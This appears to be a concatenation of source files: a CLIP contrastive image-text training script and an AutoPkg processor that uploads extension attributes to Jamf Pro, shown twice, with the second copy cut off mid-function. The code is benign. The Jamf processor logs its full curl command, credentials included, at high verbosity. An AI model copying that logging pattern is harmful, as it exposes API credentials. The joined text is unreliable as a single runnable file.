class Transform(torch.nn.Module):
    """Resize / center-crop / float-convert / normalize pipeline for image tensors.

    Instances are compiled with torch.jit.script in main(), so the body is kept
    TorchScript-friendly.
    """
    def __init__(self, image_size, mean, std):
        super().__init__()
        # BICUBIC resize of the shorter edge, square crop to image_size, cast to
        # float, then per-channel normalization with the extractor's mean/std.
        self.transforms = torch.nn.Sequential(
            Resize([image_size], interpolation=InterpolationMode.BICUBIC),
            CenterCrop(image_size),
            ConvertImageDtype(torch.float),
            Normalize(mean, std),
        )
    def forward(self, x: Image) -> torch.Tensor:
        # Pure preprocessing: no gradients are ever needed through these ops.
        with torch.no_grad():
            x = self.transforms(x)
        return x
def collate_fn(examples):
    """Collate a list of per-example feature dicts into one batched dict.

    Stacks the image tensors and converts the tokenized caption fields to long
    tensors; `return_loss=True` tells the CLIP-style model to compute its
    contrastive loss in the forward pass.
    """
    batch = {
        "pixel_values": torch.stack([ex["pixel_values"] for ex in examples]),
        "input_ids": torch.tensor([ex["input_ids"] for ex in examples], dtype=torch.long),
        "attention_mask": torch.tensor([ex["attention_mask"] for ex in examples], dtype=torch.long),
        "return_loss": True,
    }
    return batch
def main():
    """Train/evaluate a CLIP-style dual-encoder on an image-caption dataset.

    Orchestrates: argument parsing, logging setup, checkpoint detection,
    dataset loading, model/tokenizer/feature-extractor instantiation,
    caption tokenization + on-the-fly image transforms, and the Trainer-driven
    train/eval loop, optionally pushing the result to the Hub.

    Fixes: accesses to ``data_args.test_file`` go through ``getattr`` because
    DataTrainingArguments does not declare that field in this file; the
    ``do_eval`` error message said "train validation"; the process-summary log
    line was missing a separator before "distributed training".
    """
    # 1. Parse input arguments
    # See all possible arguments in src/transformers/training_args.py
    # or by passing the --help flag to this script.
    # We now keep distinct sets of args, for a cleaner separation of concerns.
    parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments))
    if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
        # If we pass only one argument to the script and it's the path to a json file,
        # let's parse it to get our arguments.
        model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
    else:
        model_args, data_args, training_args = parser.parse_args_into_dataclasses()
    # 2. Setup logging
    logging.basicConfig(
        format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
        datefmt="%m/%d/%Y %H:%M:%S",
        handlers=[logging.StreamHandler(sys.stdout)],
    )
    log_level = training_args.get_process_log_level()
    logger.setLevel(log_level)
    transformers.utils.logging.set_verbosity(log_level)
    transformers.utils.logging.enable_default_handler()
    transformers.utils.logging.enable_explicit_format()
    # Log on each process the small summary:
    logger.warning(
        f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
        + f", distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
    )
    logger.info(f"Training/evaluation parameters {training_args}")
    # 3. Detecting last checkpoint and eventualy continue from last checkpoint
    last_checkpoint = None
    if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
        last_checkpoint = get_last_checkpoint(training_args.output_dir)
        if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
            raise ValueError(
                f"Output directory ({training_args.output_dir}) already exists and is not empty. "
                "Use --overwrite_output_dir to overcome."
            )
        elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
            logger.info(
                f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
                "the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
            )
    # 4. Load dataset
    # Get the datasets: you can either provide your own CSV/JSON training and evaluation files (see below)
    # or just provide the name of one of the public datasets available on the hub at https://huggingface.co/datasets/
    # (the dataset will be downloaded automatically from the datasets Hub).
    #
    # For CSV/JSON files this script will use the first column for the full image path and the second column for the
    # captions (unless you specify column names for this with the `image_column` and `caption_column` arguments).
    #
    if data_args.dataset_name is not None:
        # Downloading and loading a dataset from the hub.
        dataset = load_dataset(
            data_args.dataset_name,
            data_args.dataset_config_name,
            cache_dir=model_args.cache_dir,
            keep_in_memory=False,
            data_dir=data_args.data_dir,
        )
    else:
        data_files = {}
        if data_args.train_file is not None:
            data_files["train"] = data_args.train_file
            extension = data_args.train_file.split(".")[-1]
        if data_args.validation_file is not None:
            data_files["validation"] = data_args.validation_file
            extension = data_args.validation_file.split(".")[-1]
        # DataTrainingArguments may not declare `test_file`; getattr avoids an
        # AttributeError when the field is absent.
        test_file = getattr(data_args, "test_file", None)
        if test_file is not None:
            data_files["test"] = test_file
            extension = test_file.split(".")[-1]
        dataset = load_dataset(extension, data_files=data_files, cache_dir=model_args.cache_dir)
    # See more about loading any type of standard or custom dataset (from files, python dict, pandas DataFrame, etc) at
    # https://huggingface.co/docs/datasets/loading_datasets.html.
    # 5. Load pretrained model, tokenizer, and feature extractor
    if model_args.tokenizer_name:
        tokenizer = AutoTokenizer.from_pretrained(
            model_args.tokenizer_name, cache_dir=model_args.cache_dir, use_fast=model_args.use_fast_tokenizer
        )
    elif model_args.model_name_or_path:
        tokenizer = AutoTokenizer.from_pretrained(
            model_args.model_name_or_path, cache_dir=model_args.cache_dir, use_fast=model_args.use_fast_tokenizer
        )
    else:
        raise ValueError(
            "You are instantiating a new tokenizer from scratch. This is not supported by this script."
            "You can do it from another script, save it, and load it from here, using --tokenizer_name."
        )
    # Load feature_extractor, in this script we only use this to get the mean and std for normalization.
    feature_extractor = AutoFeatureExtractor.from_pretrained(
        model_args.feature_extractor_name or model_args.model_name_or_path,
        cache_dir=model_args.cache_dir,
        revision=model_args.model_revision,
        use_auth_token=True if model_args.use_auth_token else None,
    )
    model = AutoModel.from_pretrained(
        model_args.model_name_or_path,
        cache_dir=model_args.cache_dir,
        revision=model_args.model_revision,
        use_auth_token=True if model_args.use_auth_token else None,
    )
    config = model.config
    def _freeze_params(module):
        # Disable gradients for every parameter of `module`.
        for param in module.parameters():
            param.requires_grad = False
    if model_args.freeze_vision_model:
        _freeze_params(model.vision_model)
    if model_args.freeze_text_model:
        _freeze_params(model.text_model)
    # set seed for torch dataloaders
    set_seed(training_args.seed)
    # Preprocessing the datasets.
    # We need to tokenize inputs and targets.
    if training_args.do_train:
        column_names = dataset["train"].column_names
    elif training_args.do_eval:
        column_names = dataset["validation"].column_names
    elif training_args.do_predict:
        column_names = dataset["test"].column_names
    else:
        logger.info("There is nothing to do. Please pass `do_train`, `do_eval` and/or `do_predict`.")
        return
    # 6. Get the column names for input/target.
    dataset_columns = dataset_name_mapping.get(data_args.dataset_name, None)
    if data_args.image_column is None:
        image_column = dataset_columns[0] if dataset_columns is not None else column_names[0]
    else:
        image_column = data_args.image_column
        if image_column not in column_names:
            raise ValueError(
                f"--image_column' value '{data_args.image_column}' needs to be one of: {', '.join(column_names)}"
            )
    if data_args.caption_column is None:
        caption_column = dataset_columns[1] if dataset_columns is not None else column_names[1]
    else:
        caption_column = data_args.caption_column
        if caption_column not in column_names:
            raise ValueError(
                f"--caption_column' value '{data_args.caption_column}' needs to be one of: {', '.join(column_names)}"
            )
    # 7. Preprocessing the datasets.
    # Initialize torchvision transforms and jit it for faster processing.
    image_transformations = Transform(
        config.vision_config.image_size, feature_extractor.image_mean, feature_extractor.image_std
    )
    image_transformations = torch.jit.script(image_transformations)
    # Preprocessing the datasets.
    # We need to tokenize input captions and transform the images.
    def tokenize_captions(examples):
        # Batched map fn: adds input_ids/attention_mask columns for the captions.
        captions = [caption for caption in examples[caption_column]]
        text_inputs = tokenizer(captions, max_length=data_args.max_seq_length, padding="max_length", truncation=True)
        examples["input_ids"] = text_inputs.input_ids
        examples["attention_mask"] = text_inputs.attention_mask
        return examples
    def transform_images(examples):
        # set_transform fn: decodes and transforms images lazily, per batch.
        images = [read_image(image_file, mode=ImageReadMode.RGB) for image_file in examples[image_column]]
        examples["pixel_values"] = [image_transformations(image) for image in images]
        return examples
    def filter_corrupt_images(examples):
        """remove problematic images"""
        valid_images = []
        for image_file in examples[image_column]:
            try:
                Image.open(image_file)
                valid_images.append(True)
            except Exception:
                valid_images.append(False)
        return valid_images
    if training_args.do_train:
        if "train" not in dataset:
            raise ValueError("--do_train requires a train dataset")
        train_dataset = dataset["train"]
        if data_args.max_train_samples is not None:
            max_train_samples = min(len(train_dataset), data_args.max_train_samples)
            train_dataset = train_dataset.select(range(max_train_samples))
        train_dataset = train_dataset.filter(
            filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
        )
        train_dataset = train_dataset.map(
            function=tokenize_captions,
            batched=True,
            remove_columns=[col for col in column_names if col != image_column],
            num_proc=data_args.preprocessing_num_workers,
            load_from_cache_file=not data_args.overwrite_cache,
            desc="Running tokenizer on train dataset",
        )
        # Transform images on the fly as doing it on the whole dataset takes too much time.
        train_dataset.set_transform(transform_images)
    if training_args.do_eval:
        if "validation" not in dataset:
            raise ValueError("--do_eval requires a validation dataset")
        eval_dataset = dataset["validation"]
        if data_args.max_eval_samples is not None:
            max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
            eval_dataset = eval_dataset.select(range(max_eval_samples))
        eval_dataset = eval_dataset.filter(
            filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
        )
        eval_dataset = eval_dataset.map(
            function=tokenize_captions,
            batched=True,
            num_proc=data_args.preprocessing_num_workers,
            remove_columns=[col for col in column_names if col != image_column],
            load_from_cache_file=not data_args.overwrite_cache,
            desc="Running tokenizer on validation dataset",
        )
        # Transform images on the fly as doing it on the whole dataset takes too much time.
        eval_dataset.set_transform(transform_images)
    if training_args.do_predict:
        if "test" not in dataset:
            raise ValueError("--do_predict requires a test dataset")
        test_dataset = dataset["test"]
        if data_args.max_eval_samples is not None:
            max_eval_samples = min(len(test_dataset), data_args.max_eval_samples)
            test_dataset = test_dataset.select(range(max_eval_samples))
        test_dataset = test_dataset.filter(
            filter_corrupt_images, batched=True, num_proc=data_args.preprocessing_num_workers
        )
        test_dataset = test_dataset.map(
            function=tokenize_captions,
            batched=True,
            num_proc=data_args.preprocessing_num_workers,
            remove_columns=[col for col in column_names if col != image_column],
            load_from_cache_file=not data_args.overwrite_cache,
            desc="Running tokenizer on test dataset",
        )
        # Transform images on the fly as doing it on the whole dataset takes too much time.
        test_dataset.set_transform(transform_images)
    # 8. Initalize our trainer
    trainer = Trainer(
        model=model,
        args=training_args,
        train_dataset=train_dataset if training_args.do_train else None,
        eval_dataset=eval_dataset if training_args.do_eval else None,
        data_collator=collate_fn,
    )
    # 9. Training
    if training_args.do_train:
        checkpoint = None
        if training_args.resume_from_checkpoint is not None:
            checkpoint = training_args.resume_from_checkpoint
        elif last_checkpoint is not None:
            checkpoint = last_checkpoint
        train_result = trainer.train(resume_from_checkpoint=checkpoint)
        trainer.save_model()
        trainer.log_metrics("train", train_result.metrics)
        trainer.save_metrics("train", train_result.metrics)
        trainer.save_state()
    # 10. Evaluation
    if training_args.do_eval:
        metrics = trainer.evaluate()
        trainer.log_metrics("eval", metrics)
        trainer.save_metrics("eval", metrics)
    # 11. Write Training Stats and push to hub.
    kwargs = {"finetuned_from": model_args.model_name_or_path, "tasks": "contrastive-image-text-modeling"}
    if data_args.dataset_name is not None:
        kwargs["dataset_tags"] = data_args.dataset_name
        if data_args.dataset_config_name is not None:
            kwargs["dataset_args"] = data_args.dataset_config_name
            kwargs["dataset"] = f"{data_args.dataset_name} {data_args.dataset_config_name}"
        else:
            kwargs["dataset"] = data_args.dataset_name
    if training_args.push_to_hub:
        trainer.push_to_hub(**kwargs)
    else:
        trainer.create_model_card(**kwargs)
# Standard script entry-point guard.
if __name__ == "__main__":
    main()
|
#!/usr/local/autopkg/python
"""
JamfExtensionAttributeUploader processor for uploading extension attributes
to Jamf Pro using AutoPkg
by G Pugh
"""
import json
import re
import os
import subprocess
import uuid
from collections import namedtuple
from base64 import b64encode
from pathlib import Path
from shutil import rmtree
from time import sleep
from xml.sax.saxutils import escape
from autopkglib import Processor, ProcessorError # pylint: disable=import-error
class JamfExtensionAttributeUploader(Processor):
    """A processor for AutoPkg that will upload an item to a Jamf Cloud or on-prem server.

    Fix: the curl-command debug log used double quotes inside a double-quoted
    f-string, which is a SyntaxError on Python versions before 3.12.
    """
    input_variables = {
        "JSS_URL": {
            "required": True,
            "description": "URL to a Jamf Pro server that the API user has write access "
            "to, optionally set as a key in the com.github.autopkg "
            "preference file.",
        },
        "API_USERNAME": {
            "required": True,
            "description": "Username of account with appropriate access to "
            "jss, optionally set as a key in the com.github.autopkg "
            "preference file.",
        },
        "API_PASSWORD": {
            "required": True,
            "description": "Password of api user, optionally set as a key in "
            "the com.github.autopkg preference file.",
        },
        "ea_name": {
            "required": False,
            "description": "Extension Attribute name",
            "default": "",
        },
        "ea_script_path": {
            "required": False,
            "description": "Full path to the script to be uploaded",
        },
        "replace_ea": {
            "required": False,
            "description": "Overwrite an existing category if True.",
            "default": False,
        },
    }
    output_variables = {
        "jamfextensionattributeuploader_summary_result": {
            "description": "Description of interesting results.",
        },
    }
    # do not edit directly - copy from template
    def write_json_file(self, data, tmp_dir="/tmp/jamf_upload"):
        """dump some json to a temporary file"""
        self.make_tmp_dir(tmp_dir)
        tf = os.path.join(tmp_dir, f"jamf_upload_{str(uuid.uuid4())}.json")
        with open(tf, "w") as fp:
            json.dump(data, fp)
        return tf
    # do not edit directly - copy from template
    def write_temp_file(self, data, tmp_dir="/tmp/jamf_upload"):
        """dump some text to a temporary file"""
        self.make_tmp_dir(tmp_dir)
        tf = os.path.join(tmp_dir, f"jamf_upload_{str(uuid.uuid4())}.txt")
        with open(tf, "w") as fp:
            fp.write(data)
        return tf
    # do not edit directly - copy from template
    def make_tmp_dir(self, tmp_dir="/tmp/jamf_upload"):
        """make the tmp directory"""
        if not os.path.exists(tmp_dir):
            os.mkdir(tmp_dir)
        return tmp_dir
    # do not edit directly - copy from template
    def clear_tmp_dir(self, tmp_dir="/tmp/jamf_upload"):
        """remove the tmp directory"""
        if os.path.exists(tmp_dir):
            rmtree(tmp_dir)
        return tmp_dir
    # do not edit directly - copy from template
    def curl(self, method, url, auth, data="", additional_headers=""):
        """
        build a curl command based on method (GET, PUT, POST, DELETE)
        If the URL contains 'uapi' then token should be passed to the auth variable,
        otherwise the enc_creds variable should be passed to the auth variable
        """
        tmp_dir = self.make_tmp_dir()
        headers_file = os.path.join(tmp_dir, "curl_headers_from_jamf_upload.txt")
        output_file = os.path.join(tmp_dir, "curl_output_from_jamf_upload.txt")
        cookie_jar = os.path.join(tmp_dir, "curl_cookies_from_jamf_upload.txt")
        # build the curl command
        curl_cmd = [
            "/usr/bin/curl",
            "--silent",
            "--show-error",
            "-X",
            method,
            "-D",
            headers_file,
            "--output",
            output_file,
            url,
        ]
        # authorisation if using Jamf Pro API or Classic API
        # if using uapi and we already have a token then we use the token for authorization
        if "uapi" in url and "tokens" not in url:
            curl_cmd.extend(["--header", f"authorization: Bearer {auth}"])
        # basic auth to obtain a token, or for classic API
        elif "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
            curl_cmd.extend(["--header", f"authorization: Basic {auth}"])
        # set either Accept or Content-Type depending on method
        if method == "GET" or method == "DELETE":
            curl_cmd.extend(["--header", "Accept: application/json"])
        # icon upload requires special method
        elif method == "POST" and "fileuploads" in url:
            curl_cmd.extend(["--header", "Content-type: multipart/form-data"])
            curl_cmd.extend(["--form", f"name=@{data}"])
        elif method == "POST" or method == "PUT":
            if data:
                if "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
                    # jamf data upload requires upload-file argument
                    curl_cmd.extend(["--upload-file", data])
                else:
                    # slack requires data argument
                    curl_cmd.extend(["--data", data])
            # uapi and slack accepts json, classic API only accepts xml
            if "JSSResource" in url:
                curl_cmd.extend(["--header", "Content-type: application/xml"])
            else:
                curl_cmd.extend(["--header", "Content-type: application/json"])
        else:
            self.output(f"WARNING: HTTP method {method} not supported")
        # write session for jamf requests
        if "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
            try:
                with open(headers_file, "r") as file:
                    headers = file.readlines()
                existing_headers = [x.strip() for x in headers]
                for header in existing_headers:
                    if "APBALANCEID" in header or "AWSALB" in header:
                        with open(cookie_jar, "w") as fp:
                            fp.write(header)
            except IOError:
                pass
            # look for existing session
            try:
                with open(cookie_jar, "r") as file:
                    headers = file.readlines()
                existing_headers = [x.strip() for x in headers]
                for header in existing_headers:
                    if "APBALANCEID" in header or "AWSALB" in header:
                        cookie = header.split()[1].rstrip(";")
                        self.output(f"Existing cookie found: {cookie}", verbose_level=2)
                        curl_cmd.extend(["--cookie", cookie])
            except IOError:
                self.output(
                    "No existing cookie found - starting new session", verbose_level=2
                )
        # additional headers for advanced requests
        if additional_headers:
            curl_cmd.extend(additional_headers)
        # NOTE: single quotes inside the f-string expression; double quotes here
        # are a SyntaxError before Python 3.12.
        self.output(f"curl command: {' '.join(curl_cmd)}", verbose_level=3)
        # now subprocess the curl command and build the r tuple which contains the
        # headers, status code and outputted data
        subprocess.check_output(curl_cmd)
        r = namedtuple(
            "r", ["headers", "status_code", "output"], defaults=(None, None, None)
        )
        try:
            with open(headers_file, "r") as file:
                headers = file.readlines()
            r.headers = [x.strip() for x in headers]
            for header in r.headers:  # pylint: disable=not-an-iterable
                if re.match(r"HTTP/(1.1|2)", header) and "Continue" not in header:
                    r.status_code = int(header.split()[1])
        except IOError:
            raise ProcessorError(f"WARNING: {headers_file} not found")
        if os.path.exists(output_file) and os.path.getsize(output_file) > 0:
            with open(output_file, "rb") as file:
                if "uapi" in url:
                    r.output = json.load(file)
                else:
                    r.output = file.read()
        else:
            self.output(f"No output from request ({output_file} not found or empty)")
        # attributes were assigned on the class above, so the instance returned
        # here resolves headers/status_code/output to those values
        return r()
    # do not edit directly - copy from template
    def status_check(self, r, endpoint_type, obj_name):
        """Return a message dependent on the HTTP response"""
        if r.status_code == 200 or r.status_code == 201:
            self.output(f"{endpoint_type} '{obj_name}' uploaded successfully")
            return "break"
        elif r.status_code == 409:
            self.output(r.output, verbose_level=2)
            raise ProcessorError(
                f"WARNING: {endpoint_type} '{obj_name}' upload failed due to a conflict"
            )
        elif r.status_code == 401:
            raise ProcessorError(
                f"ERROR: {endpoint_type} '{obj_name}' upload failed due to permissions error"
            )
        else:
            # any other status: log a warning and return None so the caller retries
            self.output(f"WARNING: {endpoint_type} '{obj_name}' upload failed")
            self.output(r.output, verbose_level=2)
    # do not edit directly - copy from template
    def get_path_to_file(self, filename):
        """AutoPkg is not very good at finding dependent files. This function
        will look inside the search directories for any supplied file"""
        # if the supplied file is not a path, use the override directory or
        # recipe dir if no override
        recipe_dir = self.env.get("RECIPE_DIR")
        filepath = os.path.join(recipe_dir, filename)
        if os.path.exists(filepath):
            self.output(f"File found at: {filepath}")
            return filepath
        # if not found, search parent directories to look for it
        if self.env.get("PARENT_RECIPES"):
            # also look in the repos containing the parent recipes.
            parent_recipe_dirs = list(
                {os.path.dirname(item) for item in self.env["PARENT_RECIPES"]}
            )
            matched_filepath = ""
            for d in parent_recipe_dirs:
                # check if we are in the root of a parent repo, if not, ascend to the root
                # note that if the parents are not in a git repo, only the same
                # directory as the recipe will be searched for templates
                if not os.path.isdir(os.path.join(d, ".git")):
                    d = os.path.dirname(d)
                for path in Path(d).rglob(filename):
                    matched_filepath = str(path)
                    break
            if matched_filepath:
                self.output(f"File found at: {matched_filepath}")
                return matched_filepath
    # do not edit directly - copy from template
    def check_api_obj_id_from_name(self, jamf_url, object_type, object_name, enc_creds):
        """check if a Classic API object with the same name exists on the server"""
        # define the relationship between the object types and their URL
        # we could make this shorter with some regex but I think this way is clearer
        object_types = {
            "package": "packages",
            "computer_group": "computergroups",
            "policy": "policies",
            "extension_attribute": "computerextensionattributes",
        }
        object_list_types = {
            "package": "packages",
            "computer_group": "computer_groups",
            "policy": "policies",
            "extension_attribute": "computer_extension_attributes",
        }
        url = f"{jamf_url}/JSSResource/{object_types[object_type]}"
        r = self.curl("GET", url, enc_creds)
        if r.status_code == 200:
            object_list = json.loads(r.output)
            self.output(
                object_list, verbose_level=4,
            )
            obj_id = 0
            for obj in object_list[object_list_types[object_type]]:
                self.output(
                    obj, verbose_level=3,
                )
                # we need to check for a case-insensitive match
                if obj["name"].lower() == object_name.lower():
                    obj_id = obj["id"]
            return obj_id
    # do not edit directly - copy from template
    def substitute_assignable_keys(self, data, xml_escape=False):
        """substitutes any key in the inputted text using the %MY_KEY% nomenclature"""
        # make up to five passes to ensure that all (possibly nested) keys are substituted
        loop = 5
        while loop > 0:
            loop = loop - 1
            found_keys = re.findall(r"\%\w+\%", data)
            if not found_keys:
                break
            found_keys = [i.replace("%", "") for i in found_keys]
            for found_key in found_keys:
                if self.env.get(found_key):
                    self.output(
                        (
                            f"Replacing any instances of '{found_key}' with",
                            f"'{str(self.env.get(found_key))}'",
                        ),
                        verbose_level=2,
                    )
                    if xml_escape:
                        replacement_key = escape(self.env.get(found_key))
                    else:
                        replacement_key = self.env.get(found_key)
                    data = data.replace(f"%{found_key}%", replacement_key)
                else:
                    self.output(f"WARNING: '{found_key}' has no replacement object!",)
                    raise ProcessorError("Unsubstitutable key in template found")
        return data
    def upload_ea(
        self, jamf_url, enc_creds, ea_name, script_path, obj_id=None,
    ):
        """Update extension attribute metadata."""
        # import script from file and replace any keys in the script
        if os.path.exists(script_path):
            with open(script_path, "r") as file:
                script_contents = file.read()
        else:
            raise ProcessorError("Script does not exist!")
        # substitute user-assignable keys
        script_contents = self.substitute_assignable_keys(script_contents)
        # XML-escape the script
        script_contents_escaped = escape(script_contents)
        # build the object
        ea_data = (
            "<computer_extension_attribute>"
            + "<name>{}</name>".format(ea_name)
            + "<enabled>true</enabled>"
            + "<description/>"
            + "<data_type>String</data_type>"
            + "<input_type>"
            + "  <type>script</type>"
            + "  <platform>Mac</platform>"
            + "  <script>{}</script>".format(script_contents_escaped)
            + "</input_type>"
            + "<inventory_display>Extension Attributes</inventory_display>"
            + "<recon_display>Extension Attributes</recon_display>"
            + "</computer_extension_attribute>"
        )
        # if we find an object ID we put, if not, we post
        if obj_id:
            url = "{}/JSSResource/computerextensionattributes/id/{}".format(
                jamf_url, obj_id
            )
        else:
            url = "{}/JSSResource/computerextensionattributes/id/0".format(jamf_url)
        self.output(
            "Extension Attribute data:", verbose_level=2,
        )
        self.output(
            ea_data, verbose_level=2,
        )
        self.output("Uploading Extension Attribute..")
        # write the template to temp file
        template_xml = self.write_temp_file(ea_data)
        count = 0
        while True:
            count += 1
            self.output(
                "Extension Attribute upload attempt {}".format(count), verbose_level=2,
            )
            method = "PUT" if obj_id else "POST"
            r = self.curl(method, url, enc_creds, template_xml)
            # check HTTP response
            if self.status_check(r, "Extension Attribute", ea_name) == "break":
                break
            if count > 5:
                self.output(
                    "ERROR: Extension Attribute upload did not succeed after 5 attempts"
                )
                self.output("\nHTTP POST Response Code: {}".format(r.status_code))
                raise ProcessorError("ERROR: Extension Attribute upload failed ")
            sleep(10)
        # clean up temp files
        self.clear_tmp_dir()
    def main(self):
        """Do the main thing here"""
        self.jamf_url = self.env.get("JSS_URL")
        self.jamf_user = self.env.get("API_USERNAME")
        self.jamf_password = self.env.get("API_PASSWORD")
        self.ea_script_path = self.env.get("ea_script_path")
        self.ea_name = self.env.get("ea_name")
        self.replace = self.env.get("replace_ea")
        # handle setting replace in overrides
        if not self.replace or self.replace == "False":
            self.replace = False
        # clear any pre-existing summary result
        if "jamfextensionattributeuploader_summary_result" in self.env:
            del self.env["jamfextensionattributeuploader_summary_result"]
        ea_uploaded = False
        # encode the username and password into a basic auth b64 encoded string
        credentials = f"{self.jamf_user}:{self.jamf_password}"
        enc_creds_bytes = b64encode(credentials.encode("utf-8"))
        enc_creds = str(enc_creds_bytes, "utf-8")
        # handle files with no path
        if "/" not in self.ea_script_path:
            found_template = self.get_path_to_file(self.ea_script_path)
            if found_template:
                self.ea_script_path = found_template
            else:
                raise ProcessorError(f"ERROR: EA file {self.ea_script_path} not found")
        # now start the process of uploading the object
        self.output(f"Checking for existing '{self.ea_name}' on {self.jamf_url}")
        # check for existing - requires obj_name
        obj_type = "extension_attribute"
        obj_id = self.check_api_obj_id_from_name(
            self.jamf_url, obj_type, self.ea_name, enc_creds
        )
        if obj_id:
            self.output(
                "Extension Attribute '{}' already exists: ID {}".format(
                    self.ea_name, obj_id
                )
            )
            if self.replace:
                self.output(
                    "Replacing existing Extension Attribute as 'replace_ea' is set to {}".format(
                        self.replace
                    ),
                    verbose_level=1,
                )
                self.upload_ea(
                    self.jamf_url, enc_creds, self.ea_name, self.ea_script_path, obj_id,
                )
                ea_uploaded = True
            else:
                self.output(
                    "Not replacing existing Extension Attribute. Use replace_ea='True' to enforce.",
                    verbose_level=1,
                )
                return
        else:
            # post the item
            self.upload_ea(
                self.jamf_url, enc_creds, self.ea_name, self.ea_script_path,
            )
            ea_uploaded = True
        # output the summary
        self.env["extension_attribute"] = self.ea_name
        self.env["ea_uploaded"] = ea_uploaded
        if ea_uploaded:
            self.env["jamfextensionattributeuploader_summary_result"] = {
                "summary_text": (
                    "The following extension attributes were created or "
                    "updated in Jamf Pro:"
                ),
                "report_fields": ["name", "path"],
                "data": {"name": self.ea_name, "path": self.ea_script_path},
            }
# Allow running the processor standalone from the command line via AutoPkg's
# shell harness.
if __name__ == "__main__":
    PROCESSOR = JamfExtensionAttributeUploader()
    PROCESSOR.execute_shell()
| #!/usr/local/autopkg/python
"""
JamfExtensionAttributeUploader processor for uploading extension attributes
to Jamf Pro using AutoPkg
by G Pugh
"""
import json
import re
import os
import subprocess
import uuid
from collections import namedtuple
from base64 import b64encode
from pathlib import Path
from shutil import rmtree
from time import sleep
from xml.sax.saxutils import escape
from autopkglib import Processor, ProcessorError # pylint: disable=import-error
class JamfExtensionAttributeUploader(Processor):
    """A processor for AutoPkg that will upload an item to a Jamf Cloud or on-prem server."""

    # AutoPkg input variable declarations. Credentials and the server URL are
    # normally set in the com.github.autopkg preferences; the remaining keys
    # describe the Extension Attribute to upload.
    input_variables = {
        "JSS_URL": {
            "required": True,
            "description": "URL to a Jamf Pro server that the API user has write access "
            "to, optionally set as a key in the com.github.autopkg "
            "preference file.",
        },
        "API_USERNAME": {
            "required": True,
            "description": "Username of account with appropriate access to "
            "jss, optionally set as a key in the com.github.autopkg "
            "preference file.",
        },
        "API_PASSWORD": {
            "required": True,
            "description": "Password of api user, optionally set as a key in "
            "the com.github.autopkg preference file.",
        },
        "ea_name": {
            "required": False,
            "description": "Extension Attribute name",
            "default": "",
        },
        "ea_script_path": {
            "required": False,
            "description": "Full path to the script to be uploaded",
        },
        "replace_ea": {
            "required": False,
            "description": "Overwrite an existing category if True.",
            "default": False,
        },
    }

    output_variables = {
        "jamfextensionattributeuploader_summary_result": {
            "description": "Description of interesting results.",
        },
    }

    # do not edit directly - copy from template
    def write_json_file(self, data, tmp_dir="/tmp/jamf_upload"):
        """Dump ``data`` as JSON to a uniquely named temporary file.

        Returns the path of the file that was written.
        """
        self.make_tmp_dir(tmp_dir)
        # uuid4 in the filename avoids collisions between concurrent runs
        tf = os.path.join(tmp_dir, f"jamf_upload_{str(uuid.uuid4())}.json")
        with open(tf, "w") as fp:
            json.dump(data, fp)
        return tf

    # do not edit directly - copy from template
    def write_temp_file(self, data, tmp_dir="/tmp/jamf_upload"):
        """Dump text ``data`` to a uniquely named temporary file.

        Returns the path of the file that was written.
        """
        self.make_tmp_dir(tmp_dir)
        tf = os.path.join(tmp_dir, f"jamf_upload_{str(uuid.uuid4())}.txt")
        with open(tf, "w") as fp:
            fp.write(data)
        return tf

    # do not edit directly - copy from template
    def make_tmp_dir(self, tmp_dir="/tmp/jamf_upload"):
        """Create the working directory if it does not yet exist; return its path."""
        if not os.path.exists(tmp_dir):
            os.mkdir(tmp_dir)
        return tmp_dir

    # do not edit directly - copy from template
    def clear_tmp_dir(self, tmp_dir="/tmp/jamf_upload"):
        """Remove the working directory and everything in it; return its path."""
        if os.path.exists(tmp_dir):
            rmtree(tmp_dir)
        return tmp_dir

    # do not edit directly - copy from template
    def curl(self, method, url, auth, data="", additional_headers=""):
        """Run a request against the Jamf (or Slack) API via /usr/bin/curl.

        build a curl command based on method (GET, PUT, POST, DELETE)
        If the URL contains 'uapi' then token should be passed to the auth variable,
        otherwise the enc_creds variable should be passed to the auth variable

        Returns a namedtuple-like object with ``headers`` (list of header
        lines), ``status_code`` (int) and ``output`` (parsed JSON for uapi
        URLs, raw bytes otherwise).
        """
        tmp_dir = self.make_tmp_dir()
        # response headers, body and load-balancer cookies are exchanged with
        # curl through files in the tmp dir rather than pipes
        headers_file = os.path.join(tmp_dir, "curl_headers_from_jamf_upload.txt")
        output_file = os.path.join(tmp_dir, "curl_output_from_jamf_upload.txt")
        cookie_jar = os.path.join(tmp_dir, "curl_cookies_from_jamf_upload.txt")
        # build the curl command
        curl_cmd = [
            "/usr/bin/curl",
            "--silent",
            "--show-error",
            "-X",
            method,
            "-D",
            headers_file,
            "--output",
            output_file,
            url,
        ]
        # authorisation if using Jamf Pro API or Classic API
        # if using uapi and we already have a token then we use the token for authorization
        if "uapi" in url and "tokens" not in url:
            curl_cmd.extend(["--header", f"authorization: Bearer {auth}"])
        # basic auth to obtain a token, or for classic API
        elif "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
            curl_cmd.extend(["--header", f"authorization: Basic {auth}"])
        # set either Accept or Content-Type depending on method
        if method == "GET" or method == "DELETE":
            curl_cmd.extend(["--header", "Accept: application/json"])
        # icon upload requires special method
        elif method == "POST" and "fileuploads" in url:
            curl_cmd.extend(["--header", "Content-type: multipart/form-data"])
            curl_cmd.extend(["--form", f"name=@{data}"])
        elif method == "POST" or method == "PUT":
            if data:
                if "uapi" in url or "JSSResource" in url or "dbfileupload" in url:
                    # jamf data upload requires upload-file argument
